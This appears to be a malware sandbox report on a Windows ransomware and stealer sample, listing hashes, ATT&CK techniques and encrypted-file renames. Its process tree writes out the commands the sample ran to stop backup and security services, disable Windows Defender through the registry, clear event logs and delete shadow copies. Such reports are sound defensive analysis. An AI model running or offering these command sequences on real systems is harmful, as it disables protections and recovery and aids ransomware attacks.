33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277

Analysis

max time kernel
134s
max time network
46s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
23-12-2022 15:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

211xahcou.exe
Size

3.9MB
MD5

0e4d44dde522c07d09d9e3086cfae803
SHA1

d8dc26e2094869a0da78ecb47494c931419302dc
SHA256

33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
SHA512

ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
SSDEEP

49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO

Score

10^/10

evasion ransomware spyware stealer trojan

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

Processes:

MpCmdRun.exe

pid process

1708 MpCmdRun.exe

pid	process
1708	MpCmdRun.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe
Clears Windows event logs 1 TTPs 3 IoCs
evasion ransomware

Indicator Removal on Host
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exe

pid process

1112 wevtutil.exe
1612 wevtutil.exe
1860 wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1712 bcdedit.exe
1804 bcdedit.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

pid	process
1112	wevtutil.exe
1612	wevtutil.exe
1860	wevtutil.exe

pid	process
1712	bcdedit.exe
1804	bcdedit.exe

Drops file in Program Files directory 64 IoCs

Processes:

211xahcou.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\en-US\PurblePlace.exe.mui.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02451_.WMF.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301050.WMF.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CERT98.POC.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\library.js	211xahcou.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\es-ES\gadget.xml	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02066_.WMF.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00192_.WMF.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Macau.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\[email protected]_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\TipTsf.dll.mui	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Catamarca.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00642_.WMF.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Urban.thmx.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NEWS.DPV.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\js\calendar.js	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239965.WMF.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\currency.html	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_ja.jar.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Riga.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower.png	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281632.WMF.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\es-ES\wab32res.dll.mui	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\SectionHeading.jpg.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGATNGET.DPV.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\slideShow.html	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0098497.WMF.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02261_.WMF.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Teal.css.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\LoanAmortization.xltx.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\gadget.xml	211xahcou.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\css\settings.css	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsBrowserUpgrade.html.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\js\settings.js	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE_F_COL.HXK.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OSPP.VBS.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\service.js	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\org-openide-filesystems.jar.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00364_.WMF.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0199283.WMF.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL078.XML.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui	211xahcou.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\settings.html	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STUDIO\THMBNAIL.PNG.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152558.WMF.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FS3BOX.POC.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\background.png	211xahcou.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationUp_ButtonGraphic.png	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_ja_4.4.0.v20140623020002.jar.o8YxndAbo6_b63CM1-U1xhPWymDuW6tONbI119_UrGP_AAAAAAAAAAA0.cv2gj	211xahcou.exe

Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

364 sc.exe
1676 sc.exe
1000 sc.exe
1092 sc.exe
1164 sc.exe
924 sc.exe
1512 sc.exe
1284 sc.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1216 vssadmin.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe211xahcou.exe

pid process

1924 powershell.exe
976 powershell.exe
1504 211xahcou.exe

pid	process
364	sc.exe
1676	sc.exe
1000	sc.exe
1092	sc.exe
1164	sc.exe
924	sc.exe
1512	sc.exe
1284	sc.exe

pid	process
1216	vssadmin.exe

pid	process
1924	powershell.exe
976	powershell.exe
1504	211xahcou.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exe

description	pid	process
Token: SeSecurityPrivilege	1860	wevtutil.exe
Token: SeBackupPrivilege	1860	wevtutil.exe
Token: SeSecurityPrivilege	1112	wevtutil.exe
Token: SeBackupPrivilege	1112	wevtutil.exe
Token: SeSecurityPrivilege	1612	wevtutil.exe
Token: SeBackupPrivilege	1612	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	1172	wmic.exe
Token: SeSecurityPrivilege	1172	wmic.exe
Token: SeTakeOwnershipPrivilege	1172	wmic.exe
Token: SeLoadDriverPrivilege	1172	wmic.exe
Token: SeSystemProfilePrivilege	1172	wmic.exe
Token: SeSystemtimePrivilege	1172	wmic.exe
Token: SeProfSingleProcessPrivilege	1172	wmic.exe
Token: SeIncBasePriorityPrivilege	1172	wmic.exe
Token: SeCreatePagefilePrivilege	1172	wmic.exe
Token: SeBackupPrivilege	1172	wmic.exe
Token: SeRestorePrivilege	1172	wmic.exe
Token: SeShutdownPrivilege	1172	wmic.exe
Token: SeDebugPrivilege	1172	wmic.exe
Token: SeSystemEnvironmentPrivilege	1172	wmic.exe
Token: SeRemoteShutdownPrivilege	1172	wmic.exe
Token: SeUndockPrivilege	1172	wmic.exe
Token: SeManageVolumePrivilege	1172	wmic.exe
Token: 33	1172	wmic.exe
Token: 34	1172	wmic.exe
Token: 35	1172	wmic.exe
Token: SeIncreaseQuotaPrivilege	632	wmic.exe
Token: SeSecurityPrivilege	632	wmic.exe
Token: SeTakeOwnershipPrivilege	632	wmic.exe
Token: SeLoadDriverPrivilege	632	wmic.exe
Token: SeSystemProfilePrivilege	632	wmic.exe
Token: SeSystemtimePrivilege	632	wmic.exe
Token: SeProfSingleProcessPrivilege	632	wmic.exe
Token: SeIncBasePriorityPrivilege	632	wmic.exe
Token: SeCreatePagefilePrivilege	632	wmic.exe
Token: SeBackupPrivilege	632	wmic.exe
Token: SeRestorePrivilege	632	wmic.exe
Token: SeShutdownPrivilege	632	wmic.exe
Token: SeDebugPrivilege	632	wmic.exe
Token: SeSystemEnvironmentPrivilege	632	wmic.exe
Token: SeRemoteShutdownPrivilege	632	wmic.exe
Token: SeUndockPrivilege	632	wmic.exe
Token: SeManageVolumePrivilege	632	wmic.exe
Token: 33	632	wmic.exe
Token: 34	632	wmic.exe
Token: 35	632	wmic.exe
Token: SeIncreaseQuotaPrivilege	632	wmic.exe
Token: SeSecurityPrivilege	632	wmic.exe
Token: SeTakeOwnershipPrivilege	632	wmic.exe
Token: SeLoadDriverPrivilege	632	wmic.exe
Token: SeSystemProfilePrivilege	632	wmic.exe
Token: SeSystemtimePrivilege	632	wmic.exe
Token: SeProfSingleProcessPrivilege	632	wmic.exe
Token: SeIncBasePriorityPrivilege	632	wmic.exe
Token: SeCreatePagefilePrivilege	632	wmic.exe
Token: SeBackupPrivilege	632	wmic.exe
Token: SeRestorePrivilege	632	wmic.exe
Token: SeShutdownPrivilege	632	wmic.exe
Token: SeDebugPrivilege	632	wmic.exe
Token: SeSystemEnvironmentPrivilege	632	wmic.exe
Token: SeRemoteShutdownPrivilege	632	wmic.exe
Token: SeUndockPrivilege	632	wmic.exe
Token: SeManageVolumePrivilege	632	wmic.exe
Token: 33	632	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

211xahcou.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 1504 wrote to memory of 1324	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 1324	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 1324	1504	211xahcou.exe	net.exe
PID 1324 wrote to memory of 1108	1324	net.exe	net1.exe
PID 1324 wrote to memory of 1108	1324	net.exe	net1.exe
PID 1324 wrote to memory of 1108	1324	net.exe	net1.exe
PID 1504 wrote to memory of 1744	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 1744	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 1744	1504	211xahcou.exe	net.exe
PID 1744 wrote to memory of 1804	1744	net.exe	net1.exe
PID 1744 wrote to memory of 1804	1744	net.exe	net1.exe
PID 1744 wrote to memory of 1804	1744	net.exe	net1.exe
PID 1504 wrote to memory of 964	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 964	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 964	1504	211xahcou.exe	net.exe
PID 964 wrote to memory of 1724	964	net.exe	net1.exe
PID 964 wrote to memory of 1724	964	net.exe	net1.exe
PID 964 wrote to memory of 1724	964	net.exe	net1.exe
PID 1504 wrote to memory of 1700	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 1700	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 1700	1504	211xahcou.exe	net.exe
PID 1700 wrote to memory of 1732	1700	net.exe	net1.exe
PID 1700 wrote to memory of 1732	1700	net.exe	net1.exe
PID 1700 wrote to memory of 1732	1700	net.exe	net1.exe
PID 1504 wrote to memory of 1956	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 1956	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 1956	1504	211xahcou.exe	net.exe
PID 1956 wrote to memory of 652	1956	net.exe	net1.exe
PID 1956 wrote to memory of 652	1956	net.exe	net1.exe
PID 1956 wrote to memory of 652	1956	net.exe	net1.exe
PID 1504 wrote to memory of 672	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 672	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 672	1504	211xahcou.exe	net.exe
PID 672 wrote to memory of 1720	672	net.exe	net1.exe
PID 672 wrote to memory of 1720	672	net.exe	net1.exe
PID 672 wrote to memory of 1720	672	net.exe	net1.exe
PID 1504 wrote to memory of 1668	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 1668	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 1668	1504	211xahcou.exe	net.exe
PID 1668 wrote to memory of 2028	1668	net.exe	net1.exe
PID 1668 wrote to memory of 2028	1668	net.exe	net1.exe
PID 1668 wrote to memory of 2028	1668	net.exe	net1.exe
PID 1504 wrote to memory of 272	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 272	1504	211xahcou.exe	net.exe
PID 1504 wrote to memory of 272	1504	211xahcou.exe	net.exe
PID 272 wrote to memory of 1800	272	net.exe	net1.exe
PID 272 wrote to memory of 1800	272	net.exe	net1.exe
PID 272 wrote to memory of 1800	272	net.exe	net1.exe
PID 1504 wrote to memory of 1092	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 1092	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 1092	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 1164	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 1164	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 1164	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 924	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 924	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 924	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 1512	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 1512	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 1512	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 1284	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 1284	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 1284	1504	211xahcou.exe	sc.exe
PID 1504 wrote to memory of 364	1504	211xahcou.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\211xahcou.exe
"C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1504
- C:\Windows\system32\net.exe
  net.exe stop "NetMsmqActivator" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "NetMsmqActivator" /y
    3⤵
    PID:1108
- C:\Windows\system32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:1804
- C:\Windows\system32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:1724
- C:\Windows\system32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:1732
- C:\Windows\system32\net.exe
  net.exe stop "UI0Detect" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UI0Detect" /y
    3⤵
    PID:652
- C:\Windows\system32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:1720
- C:\Windows\system32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:2028
- C:\Windows\system32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:272
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:1800
- C:\Windows\system32\sc.exe
  sc.exe config "NetMsmqActivator" start= disabled
  2⤵
  - Launches sc.exe
  PID:1092
- C:\Windows\system32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:1164
- C:\Windows\system32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  PID:924
- C:\Windows\system32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  PID:1512
- C:\Windows\system32\sc.exe
  sc.exe config "UI0Detect" start= disabled
  2⤵
  - Launches sc.exe
  PID:1284
- C:\Windows\system32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  PID:364
- C:\Windows\system32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  PID:1676
- C:\Windows\system32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  PID:1000
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1628
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:1212
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:240
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:1088
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
